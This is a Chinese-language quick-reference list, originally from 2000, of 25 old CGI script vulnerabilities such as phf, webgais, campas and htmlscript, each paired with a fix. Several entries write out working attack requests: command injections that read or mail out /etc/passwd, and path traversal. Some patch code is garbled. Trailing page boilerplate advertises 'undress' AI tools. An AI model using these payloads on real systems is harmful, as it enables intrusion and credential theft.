CGI安全漏洞資料速查 v1.0(轉(zhuǎn)一)
Jun 21, 2016 am 09:12 AMcgi|安全|安全漏洞
◆ CGI安全漏洞資料速查 v1.0
日期:2000-8-15
????#############################################################################
本文取自一位朋友.這本來不算是什么珍貴的東西,如果你平時注意收集的話,相信很多人都會
有比這份更全面、更好的資料.但由于某些原因.這些資料一直都不肯被公開.但我是一個崇尚完
全自由、完全開放、完全共享的little guys.所以我把這份資料公開了.希望那位朋友不要怪罪 :)
# 如有任何安全組織或個人愿意無嘗對此文進(jìn)行長期的、不間斷地維護(hù)、更新或更改. 請自行
??隨便,不必與我商討.但要求是成果必須完全地向internet公開. 任何行為的私藏都是不受歡
??迎的.
# 本文歡迎轉(zhuǎn)摘.但請保持這些聲明。
# 如有任何問題或建議,請mailto: iwillsurewin@163.net
# iwillsurewin 2000.7.28
############################################################################
1
類型: 攻擊型
名字: phf
風(fēng)險等級: 中
描述: 在NCSA 或者 Apache (1.1.1版本以內(nèi))非商業(yè)版本的Web Server中有一段程序util.c,允許黑客以root身份執(zhí)行任何一個指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建議:
解決方法: 把Apache web server升級到1.1.1以上,或者將NCSA web server升級到最新版本
_________________________________________________________________
2
類型: 攻擊型
名字: wguset.exe
風(fēng)險等級: 中
描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且wguest.exe存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_
建議: 將wguset.exe從你的Web目錄移走或刪除
解決方法: 將wguset.exe從你的Web目錄移走或刪除
___________________________________________________________________
3
類型: 攻擊型
名字: rguset.exe
風(fēng)險等級: 中
描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且rguest.exe存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_
建議: 將rguset.exe從你的Web目錄移走或刪除
解決方法: 將rguset.exe從你的Web目錄移走或刪除
_______________________________________________________________________
4
類型: 攻擊型
名字: perl.exe
風(fēng)險等級: 低
描述: 在cgi-bin執(zhí)行目錄下存在perl.exe,這屬于嚴(yán)重的配置錯誤。黑客可以在perl.exe后面加一串指令,利用瀏覽器在server上執(zhí)行任何腳本程序
建議: perl.exe是放在任何帶執(zhí)行權(quán)限的web目錄下都是不安全的
解決方法: 在web目錄下移除perl.exe這個程序.
____________________________________________________________________
5
類型: 攻擊型
名字: shtml.exe
風(fēng)險等級: 低
描述: 如果您使用Front Page作為您的WebServer,那么入侵者能夠利用IUSR_
建議: 將shtml.exe從你的Web目錄移走或刪除
解決方法: 將shtml.exe從你的Web目錄移走或刪除
___________________________________________________________________
6
類型: 攻擊型
名字: wwwboard.pl
風(fēng)險等級: 低
描述: wwwboard.pl程序容易引起攻擊者對服務(wù)器進(jìn)行D.O.S攻擊
建議: 如無必要可以刪除該文件
解決方法: 對get_variables的子程序中的下面這段:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}"; }
替換為:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling sparling@slip.net)
$fn=0;
while($fn {
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}
相關(guān)連接: http://hgfr
_________________________________________________________________________
7
類型: 攻擊型
名字: uploader.exe
風(fēng)險等級: 中
描述: 如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件
建議: 將uploader.exe從你的Web目錄移走或刪除
解決方法: 將uploader.exe從你的Web目錄移走或刪除
________________________________________________________________
8
類型: 攻擊型
名字: bdir.htr
風(fēng)險等級: 高
描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且bdir.htr存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它在您的服務(wù)器上無止境的創(chuàng)建ODBC數(shù)據(jù)庫,并生成一些可執(zhí)行的文件。
建議: 將bdir.htr從你的Web目錄移走或刪除
解決方法: 將bdir.htr從你的Web目錄移走或刪除
__________________________________________________________________
9
類型: 攻擊型
名字: Count.cgi
風(fēng)險等級: 高
描述: 在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出錯誤,允許入侵者無須登錄而遠(yuǎn)程執(zhí)行任何指令.
建議: 如無必要可以刪除該文件
解決方法: 將wwwcount升級到2.4或者以上
_________________________________________________________________
10
類型: 攻擊型
名字: test-cgi
風(fēng)險等級: 高
描述: test-cgi這個文件可以被入侵者用來瀏覽服務(wù)器上的重要信息
建議: 建議審核cgi-bin目錄下的執(zhí)行程序,嚴(yán)格控制訪問權(quán)限
解決方法: 刪除test-cgi文件
__________________________________________________________________
11
類型: 攻擊型
名字: nph-test-cgi
風(fēng)險等級: 高
描述: nph-test-cgi這個文件可以被入侵者用來瀏覽服務(wù)器上的重要信息
建議: 建議審核cgi-bin目錄下的執(zhí)行程序,嚴(yán)格控制訪問權(quán)限
解決方法: 刪除nph-test-cgi文件
__________________________________________________________________
12
類型: 攻擊型
名字: php.cgi
風(fēng)險等級: 低
描述: php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導(dǎo)致任何系統(tǒng)文件可以被入侵者讀取的漏洞
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除php.cgi程序是最好的辦法
_________________________________________________________________
13
類型: 攻擊型
名字: handler
風(fēng)險等級: 低
描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在緩存溢出錯誤,允許入侵者在server上遠(yuǎn)程執(zhí)行一段程序:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除handler文件
________________________________________________________________
14
類型: 攻擊型
名字: webgais
風(fēng)險等級: 高
描述: /cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個毛病使入侵者可以繞過程序的安全機制,執(zhí)行系統(tǒng)命令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
telnet target.machine.com 80
query=';mail+you\@your.host/passwd;echo'&output=subject&domain=paragraph
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除webgais文件
________________________________________________________________
15
類型: 攻擊型
名字: websendmail
風(fēng)險等級: 高
描述: /cgin-bin目錄下的websendmail程序允許入侵者執(zhí)行一個系統(tǒng)指令:
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 高級用戶:編輯websendmail腳本,過濾特殊字符
一般用戶:刪除websendmail文件
____________________________________________________________________
16
類型: 攻擊型
名字: webdist.cgi
風(fēng)險等級: 高
描述: 對于Irix6.2和6.3平臺,/cgi-bin目錄下的webdist.cgi有一個弱點允許入侵者無須登錄而在系統(tǒng)上執(zhí)行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi
__________________________________________________________________
17
類型: 攻擊型
名字: faxsurvey
風(fēng)險等級: 高
描述: 在Linux S.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無須登錄就能在服務(wù)器執(zhí)行指令:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/faxsurvey文件
_______________________________________________________________________
18
類型: 攻擊型
名字: htmlscript
風(fēng)險等級: 中
描述: 安裝了htmlscript2.99x或者更早版本的服務(wù)器,存在一個毛病使入侵者可以查看服務(wù)器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到3。0以上
__________________________________________________________________________
19
類型: 攻擊型
名字: pfdisplay
風(fēng)險等級: 中
描述: 在Irix6.4或者更早版本的web服務(wù)器上,/cgi-bin/pfdisplay程序允許入侵者非法查看服務(wù)器上的文件
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/pfdisplay文件,或者打補丁
補丁可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下載:
Filename: README.patch.3018
Algorithm #1 (sum -r): 37955 11 README.patch.3018
Algorithm #2 (sum): 15455 11 README.patch.3018
MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69
Filename: patchSG0003018
Algorithm #1 (sum -r): 01679 2 patchSG0003018
Algorithm #2 (sum): 12876 2 patchSG0003018
MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8
Filename: patchSG0003018.idb
Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb
Algorithm #2 (sum): 251 2 patchSG0003018.idb
MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB
Filename: patchSG0003018.performer_tools_man
Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man
Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man
MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29
Filename: patchSG0003018.performer_tools_sw
Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw
Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw
MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
_____________________________________________________________________
20
類型: 攻擊型
名字: www-sql
風(fēng)險等級: 中
描述: www-sql存在于/cgi-bin/目錄下,這將導(dǎo)致入侵可以越權(quán)訪問被保護(hù)的文件
建議: 最好刪除www-sql文件
解決方法: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");
相關(guān)連接:
_________________________________________________________________________________
21
類型: 攻擊型
名字: view-source
風(fēng)險等級: 高
描述: 在cgi-bin目錄下的view-source程序沒有對輸入進(jìn)行安全檢查,使入侵者可以查看服務(wù)器上的任何文件
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的viewsource程序
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
______________________________________________________________________
22
類型: 攻擊型
名字: campas
風(fēng)險等級: 高
描述: 在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看server上的重要文件:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的campas程序
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
___________________________________________________________________________
23
類型: 攻擊型
名字: aglimpse
風(fēng)險等級: 高
描述: 在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登錄而隨意執(zhí)行任何指令
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的aglimpse程序
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
______________________________________________________________________________
24
類型: 攻擊型
名字: AT-admin.cgi
風(fēng)險等級: 中
描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允許普通用戶完全控制整個系統(tǒng)
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的AT-admin.cgi程序
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
____________________________________________________________________________________
25
類型: 攻擊型
名字: finger
風(fēng)險等級: 中
描述: 這個位于/cgi-bin下的finger程序,可以查看其它服務(wù)器的信息,但是如果將參數(shù)改成本機,本機上的帳號信息將暴露無遺:
/cgi-bin/finger?@localhost
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的finger程序
相關(guān)連接:
________________________________________________________________________

Hot AI Tools

Undress AI Tool
Undress images for free

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

Notepad++7.3.1
Easy-to-use and free code editor

SublimeText3 Chinese version
Chinese version, very easy to use

Zend Studio 13.0.1
Powerful PHP integrated development environment

Dreamweaver CS6
Visual web development tools

SublimeText3 Mac version
God-level code editing software (SublimeText3)

Hot Topics

A bin file is a computer file format and is the abbreviation of "binary file". bin files are commonly used to store and transfer computer programs or data. In software development, the compiler converts source code into binary form and generates an executable bin file. These bin files contain the machine code of the computer program and can be run directly on the computer. Because binary files contain low-level machine instructions, they are generally more efficient and faster than text files.

Some NVIDIA Studio driver users have recently reported issues with seeing the "NODC" watermark on Adobe Premiere Pro applications. Some users also reported seeing the "YESDC" watermark as well. But, don't worry. This is all due to a corrupted bin file in NVIDIA core files. So, just find the file in File Explorer and delete the corrupted file and restart to resolve the issue. Alternatively, you can just restore the default NVIDIA3d settings. Follow these fixes to resolve the issue quickly. Fix 1 – Remove NVIDIAbin file Follow the steps below to remove it from your system

The method of using MDK to generate a bin file includes steps such as creating a project, writing application code, setting the output path and name, compiling and linking. Detailed introduction: 1. Open the MDK software and create a new project. Select "New Project" in the "Project" menu, and then select the model and supplier of the target device; 2. In the pop-up dialog box, select the save path and name of the project, and click the "Save" button, etc.

bin is a binary file format; a binary file, its use depends on the system or application; a file format abbreviation of binary, a file with the suffix ".bin" just indicates that it is in binary format; for example, virtual optical drive files commonly use " .bin" as a suffix, but it does not mean that all bin files are virtual CD-ROM files; generally speaking, they are machine codes and assembly language compiled results.

File upload and download technology with PHP and CGI: How to implement file management functions Introduction: File upload and download are one of the common functions in modern web applications. This article will introduce how to implement file upload and download functions using PHP and CGI programming languages, and show some code examples to demonstrate how to manage uploaded and downloaded files. Here’s what we’re going to cover: Basic concepts of file upload using PHP to implement file upload CGI to implement file upload Basic concepts of file download using PHP to implement file download CGI implementation under the file

How to use PHP and CGI to implement user registration and login functions User registration and login are one of the necessary functions for many websites. In this article, we will introduce how to use PHP and CGI to achieve these two functions. We'll demonstrate the entire process with a code example. 1. Implementation of the user registration function The user registration function allows new users to create an account and save their information to the database. The following is a code example to implement the user registration function: Create a database table First, we need to create a database table to store user information. Can

How to use PHP and CGI to implement the video playback function of the website In today's multimedia era, video has become an indispensable part of the website content. In order to provide a good user experience, the website needs to implement video playback function. This article will introduce how to use PHP and CGI to implement the video playback function of the website, and provide code samples for reference. 1. Preparation Before starting, you need to ensure that the server has PHP and CGI modules installed. You can do this by running the phpinfo() function or typing "php

php提交表單通過后,彈出的對話框怎樣在當(dāng)前頁彈出php提交表單通過后,彈出的對話框怎樣在當(dāng)前頁彈出而不是在空白頁彈出?想實現(xiàn)這樣的效果:而不是空白頁彈出:------解決方案--------------------如果你的驗證用PHP在后端,那么就用Ajax;僅供參考:HTML code
